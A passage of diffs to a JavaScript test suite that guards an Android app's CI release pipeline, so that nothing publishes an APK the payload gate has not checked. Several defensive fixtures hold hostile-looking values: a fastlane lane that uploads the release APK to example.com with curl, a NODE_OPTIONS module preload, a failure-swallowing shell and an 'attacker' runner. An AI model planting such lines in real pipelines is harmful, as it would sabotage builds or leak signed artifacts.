     'Create dummy google-services.json for CI',
-    'e15bdfd6f028',
+    'e15bdfd6f028509f2867d597',
     'writes a placeholder config',
     'handlesNoArtifact',
   ],
@@ -600,7 +662,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Create dummy .env file for CI',
-    '0752168128c6',
+    '0752168128c67ff7b87d9bea',
     'writes placeholder build configuration',
     'handlesNoArtifact',
   ],
@@ -608,7 +670,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Create dummy release keystore for CI',
-    'e2776b4eece8',
+    'e2776b4eece8c6640def243c',
     'writes a throwaway signing key',
     'handlesNoArtifact',
   ],
@@ -616,7 +678,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Build Android Release',
-    '8edc74417d96',
+    '8edc74417d96cb7debd71aa5',
     'builds the artifact the gate then examines in the same job',
     'buildsThenIsGated',
   ],
@@ -624,7 +686,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'ccache statistics',
-    '79d772e38080',
+    '79d772e38080380d4f45facf',
     'prints compiler cache counters',
     'handlesNoArtifact',
   ],
@@ -632,7 +694,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Verify the variant allowlist reached the llama.rn build',
-    '698e98dba6cc',
+    '698e98dba6cc9c1f508193a3',
     'greps the build log for the declared variant list',
     'handlesNoArtifact',
   ],
@@ -640,7 +702,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Verify prod APK has no automation-bridge code (DCE sanity check)',
-    '507d08fb6e5b',
+    '507d08fb6e5b78d1044cd9ce',
     'reads the built APK to assert what it does not contain',
     'carriesNoTransport',
   ],
@@ -648,7 +710,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Verify the Android payload',
-    'ea93b4c01dbd',
+    'ea93b4c01dbd7de15eaa17f8',
     'is the payload gate itself',
     'isGateStep',
   ],
@@ -656,7 +718,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Upload payload report',
-    'c9025c2bef53',
+    'c9025c2bef53b6cb994fda70',
     "uploads the gate's report, which is evidence about the artifact rather than the artifact",
     'reportUpload',
   ],
@@ -664,7 +726,7 @@ const ACCOUNTED_STEPS = [
     'ci.yml',
     'build-android',
     'Upload Android APK',
-    '74ec2ebad81a',
+    '74ec2ebad81aab6c9ac1d101',
     'publishes the checked APK as a workflow artifact',
     'publisher',
   ],
@@ -672,7 +734,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Checkout',
-    'cf37721dff3e',
+    'cf37721dff3e3d1d92137794',
     'checks out the repository',
     'action',
   ],
@@ -680,7 +742,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Setup Java',
-    '3a5994f8db80',
+    '3a5994f8db80c1d68c8d7766',
     'installs the JDK',
     'action',
   ],
@@ -688,7 +750,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Setup Node.js',
-    '72f06927c12c',
+    '72f06927c12cb51147347849',
     'installs Node',
     'action',
   ],
@@ -696,7 +758,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Install dependencies',
-    '1781a40fca38',
+    '1781a40fca382b9ee3009490',
     'installs the JS dependency tree',
     'handlesNoArtifact',
   ],
@@ -704,7 +766,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Derive the rnllama variant allowlist from the payload manifest',
-    '27fd84e82e81',
+    '27fd84e82e8128653d865ec8',
     'reads the manifest and exports a gradle property',
     'handlesNoArtifact',
   ],
@@ -712,7 +774,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Set up the Hexagon SDK',
-    'fb3527993437',
+    'fb3527993437be992b2b10a0',
     'fetches and verifies the Hexagon SDK',
     'action',
   ],
@@ -720,7 +782,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Create dummy google-services.json for CI',
-    '5b3655f75fe0',
+    '5b3655f75fe0cd8f0da5a43c',
     'writes a placeholder config',
     'handlesNoArtifact',
   ],
@@ -728,7 +790,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Create dummy .env file for CI',
-    'b1cbd6733e44',
+    'b1cbd6733e44731e10eff450',
     'writes placeholder build configuration',
     'handlesNoArtifact',
   ],
@@ -736,7 +798,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Create dummy release keystore for CI',
-    '59912466755b',
+    '59912466755b57ee64d54974',
     'writes a throwaway signing key',
     'handlesNoArtifact',
   ],
@@ -744,7 +806,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Build Android E2E APK',
-    '404ac64be90c',
+    '404ac64be90c0065f456113d',
     'builds the artifact the gate then examines in the same job',
     'buildsThenIsGated',
   ],
@@ -752,7 +814,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Verify the variant allowlist reached the llama.rn build',
-    '698e98dba6cc',
+    '698e98dba6cc9c1f508193a3',
     'greps the build log for the declared variant list',
     'handlesNoArtifact',
   ],
@@ -760,7 +822,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Verify the Android payload',
-    '96059495fc7c',
+    '96059495fc7c0d510fd52aaa',
     'is the payload gate itself',
     'isGateStep',
   ],
@@ -768,7 +830,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Upload payload report',
-    'c9025c2bef53',
+    'c9025c2bef53b6cb994fda70',
     "uploads the gate's report, which is evidence about the artifact rather than the artifact",
     'reportUpload',
   ],
@@ -776,7 +838,7 @@ const ACCOUNTED_STEPS = [
     'e2e-tests.yml',
     'build-android',
     'Upload APK artifact',
-    'a268f3772d59',
+    'a268f3772d59a8970b71e979',
     'publishes the checked APK as a workflow artifact',
     'publisher',
   ],
@@ -784,7 +846,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Checkout code',
-    'ed632cdea590',
+    'ed632cdea5905cf8c8949d4e',
     'checks out the repository',
     'action',
   ],
@@ -792,7 +854,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Maximize build space',
-    '4d41c4a237cd',
+    '4d41c4a237cdd832e94ca58d',
     'frees disk before the toolchains install',
     'handlesNoArtifact',
   ],
@@ -800,7 +862,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Set up JDK 17',
-    '93c113a968c5',
+    '93c113a968c5acb9a42759bb',
     'installs the JDK',
     'action',
   ],
@@ -808,7 +870,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Set up Node.js',
-    '8f92aaf91be0',
+    '8f92aaf91be034f522d95925',
     'installs Node',
     'action',
   ],
@@ -816,7 +878,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Install dependencies',
-    'df124beeabda',
+    'df124beeabda40ea24cff7e5',
     'installs the JS dependency tree',
     'handlesNoArtifact',
   ],
@@ -824,7 +886,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Derive the rnllama variant allowlist from the payload manifest',
-    '27fd84e82e81',
+    '27fd84e82e8128653d865ec8',
     'reads the manifest and exports a gradle property',
     'handlesNoArtifact',
   ],
@@ -832,7 +894,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Set up the Hexagon SDK',
-    'fb3527993437',
+    'fb3527993437be992b2b10a0',
     'fetches and verifies the Hexagon SDK',
     'action',
   ],
@@ -840,7 +902,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Set up Ruby',
-    'c6bd8de9ca3a',
+    'c6bd8de9ca3a97dfa137eb1a',
     'installs Ruby and the bundle',
     'action',
   ],
@@ -848,7 +910,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Bump versions',
-    'edf1504a267b',
+    'edf1504a267b4f22dbcfbcbb',
     'rewrites the version in tracked files',
     'handlesNoArtifact',
   ],
@@ -856,7 +918,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Commit and push version changes',
-    '14002b2eb6a5',
+    '14002b2eb6a5a9041659e3a3',
     'pushes the version-bump commit; the tag is pushed after the gate',
     'pushesOnlyTheBumpCommit',
   ],
@@ -864,7 +926,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Set up Android Keystore',
-    'e8ae052abd03',
+    'e8ae052abd033b10f315b388',
     'writes the signing keystore',
     'handlesNoArtifact',
   ],
@@ -872,7 +934,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Authenticate to Google Cloud',
-    '6ab20557d737',
+    '6ab20557d737acb66b9c5019',
     'mints a Google Cloud credential',
     'action',
   ],
@@ -880,7 +942,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Create .env file',
-    '932c23c2e022',
+    '932c23c2e0226c77099b814d',
     'writes build configuration',
     'handlesNoArtifact',
   ],
@@ -888,7 +950,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Build Android app',
-    'efc23e757a4e',
+    'efc23e757a4ec3576d0ed3f8',
     'builds the artifacts the gate then examines in the same job',
     'buildsThenIsGated',
   ],
@@ -896,7 +958,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Verify the variant allowlist reached the llama.rn build',
-    '698e98dba6cc',
+    '698e98dba6cc9c1f508193a3',
     'greps the build log for the declared variant list',
     'handlesNoArtifact',
   ],
@@ -904,7 +966,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Verify the Android payload',
-    '3a5ceba12bf9',
+    '3a5ceba12bf9ca828dfb3373',
     'is the payload gate itself',
     'isGateStep',
   ],
@@ -912,7 +974,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Upload payload report',
-    'c9025c2bef53',
+    'c9025c2bef53b6cb994fda70',
     "uploads the gate's report, which is evidence about the artifact rather than the artifact",
     'reportUpload',
   ],
@@ -920,7 +982,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Upload Android app to Alpha track',
-    '3f3f10876f2c',
+    '3f3f10876f2cdb90f5d7e89b',
     'publishes the checked bundle to Play',
     'publisher',
   ],
@@ -928,7 +990,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Push the release tag',
-    'bba9bef8ba94',
+    'bba9bef8ba948fa546cc2ed2',
     'pushes the release tag after the gate',
     'publisher',
   ],
@@ -936,7 +998,7 @@ const ACCOUNTED_STEPS = [
     'release.yml',
     'build_android',
     'Create GitHub Release',
-    '62888b052a79',
+    '62888b052a7934ada019efc1',
     'publishes the checked APK to a GitHub Release',
     'publisher',
   ],
@@ -1275,12 +1337,6 @@ function violationsOfPathIdentity(m) {
         );
       }
       for (const artifact of publisher.paths) {
-        if (artifact === UNRESOLVED_PATH) {
-          problems.push(
-            `${where(step)} publishes a path this parse cannot resolve to a filename, so no gate step can be shown to have examined it`,
-          );
-          continue;
-        }
         const gate = gates
           .filter(
             candidate =>
@@ -1337,8 +1393,7 @@ function violationsOfGateCanFail(m) {
     for (const step of job.steps) {
       const publisher = publisherOf(step, m.lanes);
       // A report upload ships evidence about the artifact rather than the
-      // artifact, and runs whatever the gate decided. A tag push names no file
-      // and is still a publish.
+      // artifact. A tag push names no file and is still a publish.
       const shipsOnlyDeclaredFiles =
         publisher &&
         publisher.declared > 0 &&
@@ -1451,6 +1506,16 @@ function violationsOfUnaccountedSteps(m) {
   for (const job of allJobs(m)) {
     if (!isBuildingJob(job, m.lanes)) {
       continue;
+    }
+    const container = ACCOUNTED_JOBS[`${job.workflow}/${job.id}`];
+    if (!container) {
+      problems.push(
+        `${job.workflow} ${job.id} builds Android and its job and workflow keys are not accounted for`,
+      );
+    } else if (jobDigestOf(job) !== container) {
+      problems.push(
+        `${job.workflow} ${job.id} has changed around its steps since it was reviewed (container ${jobDigestOf(job)}, accounted as ${container})`,
+      );
     }
     for (const step of job.steps) {
       const entries = accountedEntriesFor(step);
@@ -1738,6 +1803,24 @@ describe('the parse itself', () => {
       3,
     );
     expect(Object.keys(ALLOWED_ACTIONS)).toHaveLength(14);
+  });
+
+  it('pins every Fastfile by content, and the declared uploads reach no build output', () => {
+    expect(fastfileDigest()).toEqual(ACCOUNTED_FASTFILES);
+    for (const declared of NON_ARTIFACT_UPLOADS) {
+      expect(declared).not.toContain('build/outputs');
+    }
+  });
+
+  it('resolves every accounted row to an assertion that exists', () => {
+    // A mistyped key yields `undefined`, and an entry with no assertion is a
+    // row that floors nothing.
+    for (const entry of ACCOUNTED_STEPS) {
+      expect({
+        entry: `${entry.workflow} ${entry.step}`,
+        resolved: entry.assert !== undefined || entry.digest !== null,
+      }).toEqual({entry: `${entry.workflow} ${entry.step}`, resolved: true});
+    }
   });
 
   it('reads the two Android fastlane lanes and what each one does', () => {
@@ -2482,9 +2565,8 @@ describe('each rule is capable of failing', () => {
   });
 
   /**
-   * The content pin. Being recognised — as a publisher, as the gate, as an
-   * allowlisted action — does not end the enquiry: a line appended inside an
-   * already-accounted step costs the same reviewed line as a new step.
+   * A line appended inside an already-accounted step costs the same reviewed
+   * line as a new step.
    */
   it.each([
     [
@@ -2582,6 +2664,132 @@ describe('each rule is capable of failing', () => {
     expect(isBuildingJob(jobIn(m, 'ci.yml', 'build-android'), m.lanes)).toBe(
       true,
     );
+  });
+
+  /**
+   * The container a step runs in decides what the step does. None of these
+   * touches a step, and every one of them changes what every step executes.
+   */
+  it.each([
+    [
+      'a shell that swallows every failure',
+      {defaults: {run: {shell: 'bash -c "bash {0}; true"'}}},
+    ],
+    [
+      'a module preloaded into every node',
+      {env: {NODE_OPTIONS: '--require ./neutralise.js'}},
+    ],
+    [
+      'a working directory the paths no longer reach',
+      {defaults: {run: {'working-directory': '/tmp/decoy'}}},
+    ],
+    ['a different machine', {'runs-on': ['self-hosted', 'attacker']}],
+    ['a container', {container: 'ghcr.io/example/img'}],
+  ])('refuses a building job carrying %s', (_label, patch) => {
+    const m = broken();
+    Object.assign(jobIn(m, 'ci.yml', 'build-android').jobKeys, patch);
+
+    expect(violationsOfUnaccountedSteps(m)).toEqual([
+      expect.stringContaining('has changed around its steps'),
+    ]);
+  });
+
+  it('refuses a workflow-level env block added around a building job', () => {
+    const m = broken();
+    jobIn(m, 'ci.yml', 'build-android').workflowKeys.env = {
+      NODE_OPTIONS: '--require ./neutralise.js',
+    };
+
+    expect(violationsOfUnaccountedSteps(m)).toEqual([
+      expect.stringContaining('has changed around its steps'),
+    ]);
+  });
+
+  /**
+   * A lane may call another by bare name. The build lane is 1300 bytes of Ruby
+   * behind one `run:`, and what it delegates to is as much part of the step as
+   * what it says.
+   */
+  it('reads a lane reached only through another lane', () => {
+    const m = broken();
+    const build = m.lanes.find(lane => lane.name === 'build_android_release');
+    build.body += '\n    ship_it\n';
+    m.lanes.push({
+      origin: 'android',
+      name: 'ship_it',
+      body: 'lane :ship_it do\n  sh("curl -T app-prod-release.apk https://example.com/")\nend',
+    });
+    const step = stepIn(m, 'release.yml', 'build_android', 'Build Android app');
+
+    expect(lanesInvokedBy(step, m.lanes).map(lane => lane.name)).toContain(
+      'ship_it',
+    );
+    expect(
+      carriesNoTransport(step, jobIn(m, 'release.yml', 'build_android'), m),
+    ).toBe(false);
+  });
+
+  it('refuses a Fastfile edited since it was reviewed', () => {
+    const edited = {...ACCOUNTED_FASTFILES, android: 'not-the-pinned-digest'};
+    expect(fastfileDigest()).not.toEqual(edited);
+  });
+
+  it('refuses a gate step that gains a key beyond its script', () => {
+    const m = broken();
+    Object.assign(
+      stepIn(m, 'ci.yml', 'build-android', 'Verify the Android payload').raw,
+      {env: {NODE_OPTIONS: '--require ./x.js'}},
+    );
+
+    expect(violationsOfGateCanFail(m)).toEqual([
+      expect.stringContaining('which the gate step may not set'),
+    ]);
+  });
+
+  it('refuses an upload of a declared name from a build-output directory', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    job.steps.push(
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: job.steps.length,
+        name: 'Upload payload report',
+        run: '',
+        uses: 'actions/upload-artifact@v4',
+        with: {
+          name: 'payload-report',
+          path: 'android/app/build/outputs/payload-report.txt',
+        },
+        raw: {},
+      }),
+    );
+
+    expect(violationsOfPathIdentity(m)).toContainEqual(
+      expect.stringContaining('neither an Android artifact'),
+    );
+  });
+
+  it.each([
+    ['a plain build task', './gradlew build'],
+    ['an abbreviated task name', './gradlew :app:aPR'],
+  ])('sees %s as building Android', (_label, run) => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-and-test');
+    job.steps.push(
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-and-test',
+        index: job.steps.length,
+        name: 'Build it',
+        run,
+        uses: '',
+        with: {},
+        raw: {},
+      }),
+    );
+
+    expect(isBuildingJob(job, m.lanes)).toBe(true);
   });
 
   it('the lane-split rule fails when the fastlane lanes are re-merged', () => {

--- a/scripts/__tests__/android-publish-ordering.test.js
+++ b/scripts/__tests__/android-publish-ordering.test.js
@@ -2,6 +2,7 @@ const fs = require('fs');
 const path = require('path');
 const yaml = require('js-yaml');
 const {createHash} = require('crypto');
+const {execFileSync} = require('child_process');
 
 /**
  * Nothing may ship an Android artifact that the payload gate has not examined.
@@ -21,21 +22,37 @@ const {createHash} = require('crypto');
 const ROOT = path.join(__dirname, '..', '..');
 const WORKFLOW_DIR = path.join(ROOT, '.github', 'workflows');
 
-// Named explicitly rather than globbed: a fourth Fastfile ships inside
-// vendor/bundle wherever `bundle install` has run, so a glob count would be
-// environment-dependent and unfit for a vacuity guard.
+/**
+ * Every tracked Fastfile, derived rather than named. A literal list is a pin
+ * whose subject is enumerated, so a fourth Fastfile is simply never read and a
+ * lane in it can build and publish unseen. `git ls-files` is the source rather
+ * than a filesystem walk because a vendored copy ships under `vendor/bundle`
+ * wherever `bundle install` has run — 3 tracked against 4 on disk here — and
+ * an environment-dependent subject is unfit for a pin.
+ *
+ * The origin is the directory holding `fastlane/`, which is what decides the
+ * platform a lane belongs to.
+ */
+const FASTFILES = execFileSync('git', ['ls-files', '*Fastfile'], {
+  cwd: ROOT,
+  encoding: 'utf-8',
+})
+  .split('\n')
+  .filter(Boolean)
+  .sort()
+  .map(file => [
+    path.dirname(path.dirname(file)) === '.'
+      ? 'root'
+      : path.dirname(path.dirname(file)),
+    path.join(ROOT, file),
+  ]);
+
 /** Pinned by content, like the composites: free-form Ruby behind one `run:`. */
 const ACCOUNTED_FASTFILES = {
   root: 'c50e1384844af4d5c37cd9d5',
   android: '3173e30e8166a178fafe40a0',
   ios: '9d6c9e883a56dfe47abc0462',
 };
-
-const FASTFILES = [
-  ['root', path.join(ROOT, 'fastlane', 'Fastfile')],
-  ['android', path.join(ROOT, 'android', 'fastlane', 'Fastfile')],
-  ['ios', path.join(ROOT, 'ios', 'fastlane', 'Fastfile')],
-];
 
 const KNOWN_WORKFLOWS = [
   'ci.yml',
@@ -306,6 +323,38 @@ function isGateStep(step) {
   );
 }
 
+/**
+ * The concerns a gate step below this one already answers for: it wrote that
+ * path as its own report, and nothing between the two touched it. Recognised
+ * by which step produced it rather than by what it is called, so no step can
+ * stage the artifact under the name and inherit the exemption.
+ */
+function unexplainedConcerns(step, job, m) {
+  const gates = job.steps.filter(isGateStep);
+  return (publisherOf(step, m.lanes)?.concerns ?? []).filter(
+    concern =>
+      !(
+        concern.kind === 'undeclared' &&
+        gates.some(
+          candidate =>
+            candidate.index < step.index &&
+            gateReports(candidate).includes(concern.token) &&
+            !job.steps.some(
+              other =>
+                other.index > candidate.index &&
+                other.index < step.index &&
+                stepText(other, m.lanes).includes(concern.token),
+            ),
+        )
+      ),
+  );
+}
+
+/** The evidence path the gate itself writes, as it writes it. */
+function gateReports(step) {
+  return [...step.run.matchAll(/--report\s+(\S+)/g)].map(match => match[1]);
+}
+
 function gateExamines(step) {
   return [...step.run.matchAll(/--(?:apk|aab)\s+(\S+)/g)].map(match =>
     path.basename(match[1]),
@@ -313,22 +362,12 @@ function gateExamines(step) {
 }
 
 /**
- * A `with:` path field, split into what it actually names. The whole value is
- * a path here — one per line, or one per list entry — so anything that is not
- * a concrete filename hides one, whatever directory it lives in. Keying on
- * `build/outputs` instead would leave `dist/`, `artifacts/` and
- * `android/app/release/` naming nothing and classifying as no publisher at all.
+ * The one upload whose path is known not to be build output, and it is iOS
+ * symbols. The gate's own report is not here: it is recognised by the gate
+ * that wrote it, because a name is something any step can stage a file under.
+ * Asserted to reach no build-output directory and to appear in no building job.
  */
-/**
- * The uploads whose paths are known not to be build output. Small, pinned, and
- * asserted to reach no build-output directory: a concrete filename that is not
- * an `.apk`/`.aab` is not thereby harmless — `tar czf out/x.tgz …/apk` produces
- * one — so the parse vouches only for the paths written down here.
- */
-const NON_ARTIFACT_UPLOADS = [
-  'payload-report.txt',
-  'ios/build/PocketPal.app.dSYM.zip',
-];
+const NON_ARTIFACT_UPLOADS = ['ios/build/PocketPal.app.dSYM.zip'];
 
 /**
  * A `with:` path field, split into what it names. The whole value is a path
@@ -526,13 +565,13 @@ const STEP_ASSERTIONS = {
   // content pin, which is what stops it growing a second publish beside the one
   // it is here for.
   publisher: null,
-  reportUpload: (step, _job, m) => {
+  reportUpload: (step, job, m) => {
     const publisher = publisherOf(step, m.lanes);
     return (
       publisher !== null &&
       publisher.paths.length === 0 &&
-      publisher.concerns.length === 0 &&
-      publisher.declared > 0
+      publisher.concerns.length > 0 &&
+      unexplainedConcerns(step, job, m).length === 0
     );
   },
   iosUpload: (step, job, m) =>
@@ -1102,10 +1141,7 @@ const compositeShipsNothing = step =>
   shipsNothing(fs.readFileSync(COMPOSITE_ACTIONS[step.uses], 'utf-8'));
 
 const compositeDigest = uses =>
-  createHash('sha256')
-    .update(codeOf(fs.readFileSync(COMPOSITE_ACTIONS[uses], 'utf-8')))
-    .digest('hex')
-    .slice(0, 12);
+  digestOfValue(codeOf(fs.readFileSync(COMPOSITE_ACTIONS[uses], 'utf-8')));
 
 const cacheReachesNoBuildOutput = step =>
   !/build\/outputs/.test(JSON.stringify(step.with));
@@ -1180,12 +1216,12 @@ const ALLOWED_ACTIONS = {
   './.github/actions/setup-hexagon-sdk': {
     reason: 'fetches and verifies the Hexagon SDK',
     assert: compositeShipsNothing,
-    digest: '0e127c3ea33a',
+    digest: '3d808d2f47fd8cdb4ee42f97',
   },
   './.github/actions/setup-ccache': {
     reason: 'restores the compiler cache',
     assert: compositeShipsNothing,
-    digest: '46922326eb0c',
+    digest: '4494b7478119382e229d070d',
   },
 };
 
@@ -1317,7 +1353,7 @@ function violationsOfPathIdentity(m) {
       if (!publisher) {
         continue;
       }
-      for (const concern of publisher.concerns) {
+      for (const concern of unexplainedConcerns(step, job, m)) {
         problems.push(
           concern.kind === 'unreadable'
             ? `${where(step)} publishes ${concern.token}, which this parse cannot resolve to a filename, so no gate step can be shown to have examined it`
@@ -1396,9 +1432,8 @@ function violationsOfGateCanFail(m) {
       // artifact. A tag push names no file and is still a publish.
       const shipsOnlyDeclaredFiles =
         publisher &&
-        publisher.declared > 0 &&
         publisher.paths.length === 0 &&
-        publisher.concerns.length === 0 &&
+        unexplainedConcerns(step, job, m).length === 0 &&
         !publisher.rules.includes('tag-push');
       if (
         publisher &&
@@ -1807,20 +1842,53 @@ describe('the parse itself', () => {
 
   it('pins every Fastfile by content, and the declared uploads reach no build output', () => {
     expect(fastfileDigest()).toEqual(ACCOUNTED_FASTFILES);
+    // The one pinned map that had no inventory of its own.
+    expect(Object.keys(ACCOUNTED_JOBS).sort()).toEqual(
+      allJobs(committed)
+        .filter(job => isBuildingJob(job, committed.lanes))
+        .map(job => `${job.workflow}/${job.id}`)
+        .sort(),
+    );
+    const inBuildingJobs = allJobs(committed)
+      .filter(job => isBuildingJob(job, committed.lanes))
+      .flatMap(job => job.steps)
+      .map(step => stepText(step, committed.lanes))
+      .join('\n');
     for (const declared of NON_ARTIFACT_UPLOADS) {
       expect(declared).not.toContain('build/outputs');
+      expect(inBuildingJobs).not.toContain(declared);
     }
   });
 
   it('resolves every accounted row to an assertion that exists', () => {
-    // A mistyped key yields `undefined`, and an entry with no assertion is a
-    // row that floors nothing.
+    // `STEP_ASSERTIONS[name]` yields `undefined` on a typo, and the rule reads
+    // `if (entry.assert && …)`, so a mistyped name silently retires the row's
+    // assertion while its digest keeps passing. A digest is per-step content
+    // and says nothing about where the step sits, so the one rule that notices
+    // a gate moving out from between a build and its publishes is exactly what
+    // a typo here would switch off. `null` is a stated absence and passes.
+    const resolves = row => row.assert !== undefined;
     for (const entry of ACCOUNTED_STEPS) {
       expect({
         entry: `${entry.workflow} ${entry.step}`,
-        resolved: entry.assert !== undefined || entry.digest !== null,
+        resolved: resolves(entry),
       }).toEqual({entry: `${entry.workflow} ${entry.step}`, resolved: true});
     }
+
+    // The guard has to read the assertion, not the digest beside it: 55 of the
+    // 58 rows carry a digest, so a disjunction over the two is answered by the
+    // digest and never looks at the name.
+    const mistyped = {
+      workflow: 'ci.yml',
+      job: 'build-android',
+      step: 'Build Android Release',
+      digest: 'a'.repeat(24),
+      assert: STEP_ASSERTIONS.buildsThenIsGate,
+    };
+    expect(resolves(mistyped)).toBe(false);
+    expect(resolves({...mistyped, assert: STEP_ASSERTIONS.publisher})).toBe(
+      true,
+    );
   });
 
   it('reads the two Android fastlane lanes and what each one does', () => {
@@ -2508,9 +2576,9 @@ describe('each rule is capable of failing', () => {
       'utf-8',
     );
     const edited = `${source}\n# a line that changes nothing and everything\n`;
-    expect(
-      createHash('sha256').update(codeOf(edited)).digest('hex').slice(0, 12),
-    ).not.toBe(compositeDigest('./.github/actions/setup-ccache'));
+    expect(digestOfValue(codeOf(edited))).not.toBe(
+      compositeDigest('./.github/actions/setup-ccache'),
+    );
   });
 
   it.each([
@@ -2790,6 +2858,57 @@ describe('each rule is capable of failing', () => {
     );
 
     expect(isBuildingJob(job, m.lanes)).toBe(true);
+  });
+
+  /**
+   * The gate's report is exempt because a gate below it wrote that path, not
+   * because of what it is called. A name would let any step stage the signed
+   * APK under it and inherit the exemption.
+   */
+  it('refuses an upload of the report path from a job with no gate', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-and-test');
+    job.steps.push(
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-and-test',
+        index: job.steps.length,
+        name: 'Upload payload report',
+        run: '',
+        uses: 'actions/upload-artifact@v4',
+        with: {name: 'payload-report', path: 'payload-report.txt'},
+        raw: {},
+      }),
+    );
+
+    expect(violationsOfPathIdentity(m)).toContainEqual(
+      expect.stringContaining('neither an Android artifact'),
+    );
+  });
+
+  it('refuses the report upload when a step restages that path after the gate', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    const gate = job.steps.findIndex(isGateStep);
+    job.steps.splice(
+      gate + 1,
+      0,
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: 0,
+        name: 'Stage it',
+        run: `cp ${GATED_APK} payload-report.txt`,
+        uses: '',
+        with: {},
+        raw: {},
+      }),
+    );
+    reindex(job);
+
+    expect(violationsOfPathIdentity(m)).toContainEqual(
+      expect.stringContaining('neither an Android artifact'),
+    );
   });
 
   it('the lane-split rule fails when the fastlane lanes are re-merged', () => {

--- a/scripts/__tests__/android-publish-ordering.test.js
+++ b/scripts/__tests__/android-publish-ordering.test.js
@@ -41,12 +41,46 @@ const SUSPICIOUS_RUN =
  * Commentary is not command. Both Ruby and shell use `#`, and both files
  * discuss the very actions this file classifies — the upload lane's comment
  * quotes `gradle(task: "bundle")` to explain why it does not build.
+ *
+ * Quote-aware, because every consumer of this text is an unanchored presence
+ * test: dropping a line's tail can only *lose* matches, which moves a step
+ * toward "unclassified" and "exempt". `gh release upload … --notes "Fixes #862"`
+ * is an ordinary line, and a naive strip turns it into a step that publishes
+ * nothing and transports nothing. Failing that direction is the one direction
+ * this file cannot afford.
+ *
+ * An unbalanced quote leaves the rest of the line unstripped, which keeps text
+ * rather than losing it — wrong in the safe direction.
  */
 function codeOf(text) {
-  return String(text)
-    .split('\n')
-    .map(line => line.replace(/(^|\s)#(?!\{).*$/, '$1'))
-    .join('\n');
+  return String(text).split('\n').map(stripComment).join('\n');
+}
+
+function stripComment(line) {
+  let quote = null;
+  for (let i = 0; i < line.length; i++) {
+    const character = line[i];
+    if (quote) {
+      if (character === '\\') {
+        i++;
+      } else if (character === quote) {
+        quote = null;
+      }
+      continue;
+    }
+    if (character === '"' || character === "'") {
+      quote = character;
+      continue;
+    }
+    const startsComment =
+      character === '#' &&
+      line[i + 1] !== '{' &&
+      (i === 0 || /\s/.test(line[i - 1]));
+    if (startsComment) {
+      return line.slice(0, i);
+    }
+  }
+  return line;
 }
 
 function parseLanes() {
@@ -100,10 +134,23 @@ const where = step => `${step.workflow} ${step.job} → ${step.name}`;
 
 // -- what a step says ------------------------------------------------------
 
+/**
+ * Every lane a step's command names. Matched against the known lane names
+ * rather than by position, because `fastlane <lane>`, `fastlane android <lane>`
+ * and `fastlane run <action>` are all valid here — `android/fastlane/Fastfile`
+ * declares `default_platform :android`, so the platform-prefixed form works and
+ * a position-based parse silently resolves it to the platform instead.
+ *
+ * `release.yml/build_android` runs no `gradlew` at all, so that job's entire
+ * building-ness rests on this resolution.
+ */
 function lanesInvokedBy(step, lanes) {
